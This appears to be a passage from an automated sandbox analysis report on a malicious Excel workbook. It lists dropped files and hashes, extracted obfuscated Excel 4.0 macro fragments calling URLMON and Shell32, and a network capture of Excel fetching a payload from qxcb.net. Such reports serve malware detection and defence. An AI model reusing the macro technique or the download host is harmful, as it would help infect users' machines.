                                                                                                                                                      SHA-512:EB8EDEDBB7F197B84B6DCEC0FBD26C5C4C497226EDE77B15271712A57D021A45B8B4C4B4020748610431973AFAD07C7FEC50632F74E5F3D2EDF932CABD93AD67
                                                                                                                                                      Malicious:false
                                                                                                                                                      Reputation:low
                                                                                                                                                      Preview: .PNG........IHDR.............[k,.....sRGB.........gAMA......a.....pHYs...t...t..f.x...}IDAT(Sm.Q.. .Ca..0~..J. 4.uK.Mkk.(........y"B}..5.......".f.gT.:^..3.8..'.....7.e..|+|}..t..f%...........eqX.5N...1'.s......R.f.Cb......IEND.B`.
                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\89BC5DAD.png
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                      File Type:PNG image data, 2812 x 2000, 4-bit colormap, non-interlaced
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):269382
                                                                                                                                                      Entropy (8bit):7.99616802448453
                                                                                                                                                      Encrypted:true
                                                                                                                                                      SSDEEP:6144:yrFLPodmRqyAVYtlKsVLCyo7NtbcY7uLaG/9t7+MB:yFPM8R3AsB+bjej/9cy
                                                                                                                                                      MD5:B06943044290A7FFFD04E6F467ECCA9F
                                                                                                                                                      SHA1:E017707BE1830FEBA3CD79300D69199A76D356F6
                                                                                                                                                      SHA-256:49AD87680A65DB60C2328D1DD03A3ACB262FFE81217566129B3D6C2284C50F16
                                                                                                                                                      SHA-512:1AD610A56DA6E79A7183AFA6F1E6BC5C46BB5F1C65F11641B5C5CBF327CA971A7057A8CB354990EAF42029F911B813B050FBD708790C20BB85BA6EB063A86BE8
                                                                                                                                                      Malicious:false
                                                                                                                                                      Reputation:moderate, very likely benign file
                                                                                                                                                      Preview: .PNG........IHDR...............w.....gAMA......a.....sRGB........-PLTE............F....ffe.....~....hLF:.'0R..~..........tRNS...............q.Kn.. .IDATx..].r.G....52....T.....)qQ....p$X...HP"...s....6...vggz.g.......v|..~....Zo...9"...x;~..zC....M.....W.i..jz..O....bw..|...n.../.../qy.....w.4....C;.A.rj.D.......F.....y...z;3E/..iC!g:.i.......z:F_v4.s.....)..l../.T..4Pi..b...Q......F.5..XT...|:..j0.I.`7.....M|..{5(....il'}S..I..D...+)...5..A.J..p.I....|..V.6..w..u....i.92@V.......W....B....y......OC.....}.Y=z.....7...(.B..=.tz).1.]wZC..V..P.s...u.T..s.... c.....$...@a"....<@Lv..4.....a...'a,..I.a|.....-i.SU../W.@.'u:".6yE.o.)p.M....m0.4H.h.q..`...c....rh.l..iE...2...g....P...&R"...*v9%.\tJ..Wln.........2.WX....Ltf@B...bD.z............P...rw.... |F.~......!.+...G....{..q......;..+..$..8'+..~.N....b...".I..yh.(d..S+..E.J...x.FT..L.F...`..hb......:Q..........z~2.l.P.!rM..`.....X&:..F0....$G....t.U...g.....7.e.I~x9.L{.."...*..gI.5....!@a.)`..O
                                                                                                                                                      C:\Users\user\AppData\Local\Temp\57E40000
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):336692
                                                                                                                                                      Entropy (8bit):7.98635714093433
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:6144:MM2G0trFLPodmRqyAVYtlKsVLCyo7NtbcY7uLaG/9t7+MmYCQ:sbFPM8R3AsB+bjej/9c3YCQ
                                                                                                                                                      MD5:8DD6FF7BA4849422AB43BEF70A1C5213
                                                                                                                                                      SHA1:CDA9AFA6B855B5DE80B37AC2B41DE78AB882FEA9
                                                                                                                                                      SHA-256:EAA31A8CEA230C464B4336CD0F3D0E437AC1F39765624A045F3E471DA46CF68F
                                                                                                                                                      SHA-512:492A4227779993C75299427CE49A4B4FD1EC79BF10606AE9782BF12FCA7752976ACD643933D6B99C5579F72010E47AD87B0F9CA45715CBA8E2BC0CD46750EC6F
                                                                                                                                                      Malicious:false
                                                                                                                                                      Reputation:low
                                                                                                                                                      Preview: ..N.0...'..".N..n.65.....<.k.&V....o..t....H..i...>...dr..t..>(kj..)..+.ijrw..<#E..H..... ....O...P`..5ict?)......:082....O}C.......F'TX...2..d:..9...Z..5.L.R\..KR5..i%xDP.`......J.....Up...-@.t.BE..1....;5.i^h..1..#<.0.sS..#...V......B.y....?..^I(....y..KM.._.]T...bv....]...:...2|...2O.{...@..{...d......r.3.....L8.g.q...i&.g.p....r...QY...r.T....\\..b.,._e..+..Y.....v.^u.=..=t'.Q...%......90..W..;.7.I.)......5..........@7....&.>].|..u..k.......a".Q..3...m..3?z.!.....m..j.........PK..........!..Q..............[Content_Types].xml ...(.....................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                      File Type:Little-endian UTF-16 Unicode text, with CR line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):22
                                                                                                                                                      Entropy (8bit):2.9808259362290785
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:QAlX0Gn:QKn
                                                                                                                                                      MD5:7962B839183642D3CDC2F9CEBDBF85CE
                                                                                                                                                      SHA1:2BE8F6F309962ED367866F6E70668508BC814C2D
                                                                                                                                                      SHA-256:5EB8655BA3D3E7252CA81C2B9076A791CD912872D9F0447F23F4C4AC4A6514F6
                                                                                                                                                      SHA-512:2C332AC29FD3FAB66DBD918D60F9BE78B589B090282ED3DBEA02C4426F6627E4AAFC4C13FBCA09EC4925EAC3ED4F8662FDF1D7FA5C9BE714F8A7B993BECB3342
                                                                                                                                                      Malicious:false
                                                                                                                                                      Reputation:high, very likely benign file
                                                                                                                                                      Preview: ....p.r.a.t.e.s.h.....
                                                                                                                                                      C:\Users\user\Desktop\~$Document3327.xlsb
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):165
                                                                                                                                                      Entropy (8bit):1.6081032063576088
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:RFXI6dtt:RJ1
                                                                                                                                                      MD5:7AB76C81182111AC93ACF915CA8331D5
                                                                                                                                                      SHA1:68B94B5D4C83A6FB415C8026AF61F3F8745E2559
                                                                                                                                                      SHA-256:6A499C020C6F82C54CD991CA52F84558C518CBD310B10623D847D878983A40EF
                                                                                                                                                      SHA-512:A09AB74DE8A70886C22FB628BDB6A2D773D31402D4E721F9EE2F8CCEE23A569342FEECF1B85C1A25183DD370D1DFFFF75317F628F9B3AA363BBB60694F5362C7
                                                                                                                                                      Malicious:true
                                                                                                                                                      Reputation:high, very likely benign file
                                                                                                                                                      Preview: .pratesh ..p.r.a.t.e.s.h. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

                                                                                                                                                      Static File Info

                                                                                                                                                      General

                                                                                                                                                      File type:Microsoft OOXML
                                                                                                                                                      Entropy (8bit):7.6281019398875065
                                                                                                                                                      TrID:
                                                                                                                                                      • Excel Microsoft Office Binary workbook document (47504/1) 49.74%
                                                                                                                                                      • Excel Microsoft Office Open XML Format document (40004/1) 41.89%
                                                                                                                                                      • ZIP compressed archive (8000/1) 8.38%
                                                                                                                                                      File name:Document3327.xlsb
                                                                                                                                                      File size:366296
                                                                                                                                                      MD5:822af84271593f38687a040b58296623
                                                                                                                                                      SHA1:dbed50d46694c84d25028d749fa8843fcfe474a1
                                                                                                                                                      SHA256:cd425ac6a7e11a5cea9eaa3cb57dd062627dc197d03293cc9240c904aef2de6b
                                                                                                                                                      SHA512:b158fcef0bb21241617cbdc6d56be77484b5f912de32cf6382bd165d51fad1c5b93f7a6dc70ae664c56a75a05b2d96328fb0536cc325b58cac4788a6857c71b1
                                                                                                                                                      SSDEEP:6144:FrFLPodmRqyAVYtlKsVLCyo7NtbcY7uLaG/9t7+M9X4XO/s:FFPM8R3AsB+bjej/9cYA
                                                                                                                                                      File Content Preview:PK..........!.5i.@....>.......[Content_Types].xml ...(.........................................................................................................................................................................................................

                                                                                                                                                      File Icon

                                                                                                                                                      Icon Hash:74f0d0d2c6d6d0f4

                                                                                                                                                      Static OLE Info

                                                                                                                                                      General

                                                                                                                                                      Document Type:OpenXML
                                                                                                                                                      Number of OLE Files:1

                                                                                                                                                      OLE File "Document3327.xlsb"

                                                                                                                                                      Indicators

                                                                                                                                                      Has Summary Info:
                                                                                                                                                      Application Name:
                                                                                                                                                      Encrypted Document:
                                                                                                                                                      Contains Word Document Stream:
                                                                                                                                                      Contains Workbook/Book Stream:
                                                                                                                                                      Contains PowerPoint Document Stream:
                                                                                                                                                      Contains Visio Document Stream:
                                                                                                                                                      Contains ObjectPool Stream:
                                                                                                                                                      Flash Objects Count:
                                                                                                                                                      Contains VBA Macros:

                                                                                                                                                      Macro 4.0 Code

                                                                                                                                                      CALL(Kerel32)
                                                                                                                                                      CALL(Kerel32)
                                                                                                                                                      CALL(URLMON)
                                                                                                                                                      CALL(Shell32)
                                                                                                                                                      
                                                                                                                                                      ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=CHAR($M$1864-959),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=T(""TITJGTRUITGRUITGRUIRTGUIGTRUTGRUITGRTGRIUGTRIUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUSGTRURTUUTRU"")",,"=TEXT(""tgrrgdyyrtgrygtryu"",""yUYYUYRUYUuyTYytTYyYER"")",,"=TEXT(""FERTRJHTRJHTGRHJYTYTYTTGRHJGTRHTRGHHTHJTJHGTRJHTRHJTGRHJTRHJTRGHJTGRHJTGRHJGTRHTRTHJHJTRTRHTRJTRGHJGTRHJGTRHJGTRJHTGRHJGTRJHGTRHJRTGHJGTRHGTRHTGRHTGRHTRTGTGRTRHJTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTHTGHHGTJGTJGTRHJTGRHJRTGHJRTGHJ"",""RT"")",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=TEXT(""FERYTTYTYTRJHTRJHTGRHJTGRHJGTRHTRGHHTHJTJHGTRJHTRHJTGRHJTRHJTRGHJTGRHJTGRHJGTRHTRTHJHJTRTRHTRJTRGHJGTRHJGTRHJGTRJHTGRHJGTRJHGTRHJRTGHJGTRHGTRHTGRHTGRHTRTGTGRTRHJTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTHTGHHGTJGTJGTRHJTGRHJRTGHJRTYTYTYTYTTYGHJ"",""RT"")",,,"=TEXT(""FERTRJHTRJHTGRHJTGRHJGTRHTRGHHTHJTJHGTRJHTRHJTGRHJTRHJTRGHJTGRHJTGRHJGTRHTRTHJHJTRTRHTRJTRGHJGTRHJGTRHJGTRJHTGRHJGTRJHGTGFGRHJRTGHJGTRHGTRHTGRHTGRHTRTGTGRTRHJTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTHTGHHGTJGTJGTRHJTGRHJRTGHJRTGHJ"",""RT"")",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=RUN($BB$667),,,,,,,=GY4\,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=F4,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=RUN($IA$228),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,90,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=H6,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=HA1,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=TEXT(""FERTRJHTRJHTGRHJTGRHJGTRHTRGHHTHJTJHGTRJHTRHJTGRHJTRHJTRGHJTGRHJTGRHJGTRHTRTHJHJTRTRHTRJTRGHJGTRHJGTRHJGTRJHTGRHJGTRJHGTRHJRTGHJGTRHGTRHTGRHTGRHTRTGTGRTRHJTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTHTGHHGTJGTJGTRHJTGRHJRTGHJRTGHJ"",""RT"")",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=RUN($DP$536),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=H6,,3443,,3243,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,

                                                                                                                                                      Network Behavior

                                                                                                                                                      Network Port Distribution

                                                                                                                                                      TCP Packets

                                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                      Nov 19, 2020 10:01:37.887011051 CET4973780192.168.2.4198.57.244.39
                                                                                                                                                      Nov 19, 2020 10:01:38.036261082 CET8049737198.57.244.39192.168.2.4
                                                                                                                                                      Nov 19, 2020 10:01:38.036412001 CET4973780192.168.2.4198.57.244.39
                                                                                                                                                      Nov 19, 2020 10:01:38.037004948 CET4973780192.168.2.4198.57.244.39
                                                                                                                                                      Nov 19, 2020 10:01:38.186299086 CET8049737198.57.244.39192.168.2.4
                                                                                                                                                      Nov 19, 2020 10:01:39.106424093 CET8049737198.57.244.39192.168.2.4
                                                                                                                                                      Nov 19, 2020 10:01:39.107994080 CET4973780192.168.2.4198.57.244.39
                                                                                                                                                      Nov 19, 2020 10:01:44.109061003 CET8049737198.57.244.39192.168.2.4
                                                                                                                                                      Nov 19, 2020 10:01:44.109210014 CET4973780192.168.2.4198.57.244.39
                                                                                                                                                      Nov 19, 2020 10:02:14.136866093 CET8049737198.57.244.39192.168.2.4

                                                                                                                                                      UDP Packets

                                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                      Nov 19, 2020 10:01:18.041996956 CET5585453192.168.2.48.8.8.8
                                                                                                                                                      Nov 19, 2020 10:01:18.055800915 CET53558548.8.8.8192.168.2.4
                                                                                                                                                      Nov 19, 2020 10:01:18.975836992 CET6454953192.168.2.48.8.8.8
                                                                                                                                                      Nov 19, 2020 10:01:18.989068031 CET53645498.8.8.8192.168.2.4
                                                                                                                                                      Nov 19, 2020 10:01:29.295825958 CET6315353192.168.2.48.8.8.8
                                                                                                                                                      Nov 19, 2020 10:01:29.308789968 CET53631538.8.8.8192.168.2.4
                                                                                                                                                      Nov 19, 2020 10:01:31.989947081 CET5299153192.168.2.48.8.8.8
                                                                                                                                                      Nov 19, 2020 10:01:32.010009050 CET53529918.8.8.8192.168.2.4
                                                                                                                                                      Nov 19, 2020 10:01:32.332667112 CET5370053192.168.2.48.8.8.8
                                                                                                                                                      Nov 19, 2020 10:01:32.359076977 CET53537008.8.8.8192.168.2.4
                                                                                                                                                      Nov 19, 2020 10:01:33.320581913 CET5370053192.168.2.48.8.8.8
                                                                                                                                                      Nov 19, 2020 10:01:33.347079039 CET53537008.8.8.8192.168.2.4
                                                                                                                                                      Nov 19, 2020 10:01:34.337886095 CET5370053192.168.2.48.8.8.8
                                                                                                                                                      Nov 19, 2020 10:01:34.350974083 CET53537008.8.8.8192.168.2.4
                                                                                                                                                      Nov 19, 2020 10:01:36.045372963 CET5172653192.168.2.48.8.8.8
                                                                                                                                                      Nov 19, 2020 10:01:36.058913946 CET53517268.8.8.8192.168.2.4
                                                                                                                                                      Nov 19, 2020 10:01:36.352031946 CET5370053192.168.2.48.8.8.8
                                                                                                                                                      Nov 19, 2020 10:01:36.365029097 CET53537008.8.8.8192.168.2.4
                                                                                                                                                      Nov 19, 2020 10:01:37.697633982 CET5679453192.168.2.48.8.8.8
                                                                                                                                                      Nov 19, 2020 10:01:37.882565022 CET53567948.8.8.8192.168.2.4
                                                                                                                                                      Nov 19, 2020 10:01:40.364273071 CET5653453192.168.2.48.8.8.8
                                                                                                                                                      Nov 19, 2020 10:01:40.368321896 CET5370053192.168.2.48.8.8.8
                                                                                                                                                      Nov 19, 2020 10:01:40.377473116 CET53565348.8.8.8192.168.2.4
                                                                                                                                                      Nov 19, 2020 10:01:40.381407976 CET53537008.8.8.8192.168.2.4
                                                                                                                                                      Nov 19, 2020 10:01:44.122191906 CET5662753192.168.2.48.8.8.8
                                                                                                                                                      Nov 19, 2020 10:01:44.135230064 CET53566278.8.8.8192.168.2.4
                                                                                                                                                      Nov 19, 2020 10:01:45.636168003 CET5662153192.168.2.48.8.8.8
                                                                                                                                                      Nov 19, 2020 10:01:45.648777962 CET53566218.8.8.8192.168.2.4
                                                                                                                                                      Nov 19, 2020 10:01:56.676181078 CET6311653192.168.2.48.8.8.8
                                                                                                                                                      Nov 19, 2020 10:01:56.688460112 CET53631168.8.8.8192.168.2.4
                                                                                                                                                      Nov 19, 2020 10:01:57.498306990 CET6407853192.168.2.48.8.8.8
                                                                                                                                                      Nov 19, 2020 10:01:57.511059999 CET53640788.8.8.8192.168.2.4
                                                                                                                                                      Nov 19, 2020 10:01:58.324636936 CET6480153192.168.2.48.8.8.8
                                                                                                                                                      Nov 19, 2020 10:01:58.341788054 CET53648018.8.8.8192.168.2.4
                                                                                                                                                      Nov 19, 2020 10:01:59.211447954 CET6172153192.168.2.48.8.8.8
                                                                                                                                                      Nov 19, 2020 10:01:59.223649979 CET53617218.8.8.8192.168.2.4
                                                                                                                                                      Nov 19, 2020 10:02:00.727202892 CET5125553192.168.2.48.8.8.8
                                                                                                                                                      Nov 19, 2020 10:02:00.739835978 CET53512558.8.8.8192.168.2.4
                                                                                                                                                      Nov 19, 2020 10:02:03.523186922 CET6152253192.168.2.48.8.8.8
                                                                                                                                                      Nov 19, 2020 10:02:03.535439968 CET53615228.8.8.8192.168.2.4
                                                                                                                                                      Nov 19, 2020 10:02:04.098735094 CET5233753192.168.2.48.8.8.8
                                                                                                                                                      Nov 19, 2020 10:02:04.118803978 CET53523378.8.8.8192.168.2.4
                                                                                                                                                      Nov 19, 2020 10:02:04.607526064 CET5504653192.168.2.48.8.8.8
                                                                                                                                                      Nov 19, 2020 10:02:04.667654037 CET53550468.8.8.8192.168.2.4
                                                                                                                                                      Nov 19, 2020 10:02:05.098495007 CET4961253192.168.2.48.8.8.8
                                                                                                                                                      Nov 19, 2020 10:02:05.111886978 CET53496128.8.8.8192.168.2.4
                                                                                                                                                      Nov 19, 2020 10:02:05.419739962 CET4928553192.168.2.48.8.8.8
                                                                                                                                                      Nov 19, 2020 10:02:05.486881971 CET53492858.8.8.8192.168.2.4
                                                                                                                                                      Nov 19, 2020 10:02:05.877567053 CET5060153192.168.2.48.8.8.8
                                                                                                                                                      Nov 19, 2020 10:02:05.890865088 CET53506018.8.8.8192.168.2.4
                                                                                                                                                      Nov 19, 2020 10:02:06.234589100 CET6087553192.168.2.48.8.8.8
                                                                                                                                                      Nov 19, 2020 10:02:06.247406006 CET53608758.8.8.8192.168.2.4
                                                                                                                                                      Nov 19, 2020 10:02:06.372172117 CET5644853192.168.2.48.8.8.8
                                                                                                                                                      Nov 19, 2020 10:02:06.385687113 CET53564488.8.8.8192.168.2.4
                                                                                                                                                      Nov 19, 2020 10:02:06.505508900 CET5917253192.168.2.48.8.8.8
                                                                                                                                                      Nov 19, 2020 10:02:06.518445015 CET53591728.8.8.8192.168.2.4
                                                                                                                                                      Nov 19, 2020 10:02:06.820759058 CET6242053192.168.2.48.8.8.8
                                                                                                                                                      Nov 19, 2020 10:02:06.833981991 CET53624208.8.8.8192.168.2.4
                                                                                                                                                      Nov 19, 2020 10:02:07.442230940 CET6057953192.168.2.48.8.8.8
                                                                                                                                                      Nov 19, 2020 10:02:07.455321074 CET53605798.8.8.8192.168.2.4
                                                                                                                                                      Nov 19, 2020 10:02:08.161462069 CET5018353192.168.2.48.8.8.8
                                                                                                                                                      Nov 19, 2020 10:02:08.208643913 CET53501838.8.8.8192.168.2.4
                                                                                                                                                      Nov 19, 2020 10:02:08.547414064 CET6153153192.168.2.48.8.8.8
                                                                                                                                                      Nov 19, 2020 10:02:08.560473919 CET53615318.8.8.8192.168.2.4
                                                                                                                                                      Nov 19, 2020 10:02:14.128393888 CET4922853192.168.2.48.8.8.8
                                                                                                                                                      Nov 19, 2020 10:02:14.142088890 CET53492288.8.8.8192.168.2.4
                                                                                                                                                      Nov 19, 2020 10:02:20.900548935 CET5979453192.168.2.48.8.8.8
                                                                                                                                                      Nov 19, 2020 10:02:20.912866116 CET53597948.8.8.8192.168.2.4
                                                                                                                                                      Nov 19, 2020 10:02:21.031737089 CET5591653192.168.2.48.8.8.8
                                                                                                                                                      Nov 19, 2020 10:02:21.044433117 CET53559168.8.8.8192.168.2.4
                                                                                                                                                      Nov 19, 2020 10:02:25.671920061 CET5275253192.168.2.48.8.8.8
                                                                                                                                                      Nov 19, 2020 10:02:25.690221071 CET53527528.8.8.8192.168.2.4
                                                                                                                                                      Nov 19, 2020 10:02:55.325743914 CET6054253192.168.2.48.8.8.8
                                                                                                                                                      Nov 19, 2020 10:02:55.338229895 CET53605428.8.8.8192.168.2.4
                                                                                                                                                      Nov 19, 2020 10:02:57.576448917 CET6068953192.168.2.48.8.8.8
                                                                                                                                                      Nov 19, 2020 10:02:57.602871895 CET53606898.8.8.8192.168.2.4

                                                                                                                                                      DNS Queries

                                                                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                      Nov 19, 2020 10:01:37.697633982 CET192.168.2.48.8.8.80x2d43Standard query (0)qxcb.netA (IP address)IN (0x0001)

                                                                                                                                                      DNS Answers

                                                                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                      Nov 19, 2020 10:01:37.882565022 CET8.8.8.8192.168.2.40x2d43No error (0)qxcb.net198.57.244.39A (IP address)IN (0x0001)

                                                                                                                                                      HTTP Request Dependency Graph

                                                                                                                                                      • qxcb.net

                                                                                                                                                      HTTP Packets

                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                      0192.168.2.449737198.57.244.3980C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                      Nov 19, 2020 10:01:38.037004948 CET89OUTGET /ds/161120.gif HTTP/1.1
                                                                                                                                                      Accept: */*
                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                      Host: qxcb.net
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Nov 19, 2020 10:01:39.106424093 CET90INHTTP/1.1 200 OK
                                                                                                                                                      Date: Thu, 19 Nov 2020 09:01:38 GMT
                                                                                                                                                      Server: Apache
                                                                                                                                                      Upgrade: h2,h2c
                                                                                                                                                      Connection: Upgrade, Keep-Alive
                                                                                                                                                      Content-Length: 0
                                                                                                                                                      Keep-Alive: timeout=5, max=75
                                                                                                                                                      Content-Type: image/gif


                                                                                                                                                      Code Manipulations

                                                                                                                                                      Statistics

                                                                                                                                                      System Behavior

                                                                                                                                                      General

                                                                                                                                                      Start time:10:01:31
                                                                                                                                                      Start date:19/11/2020
                                                                                                                                                      Path:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
                                                                                                                                                      Imagebase:0x1270000
                                                                                                                                                      File size:27110184 bytes
                                                                                                                                                      MD5 hash:5D6638F2C8F8571C593999C58866007E
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:high

                                                                                                                                                      Disassembly

                                                                                                                                                      Reset < >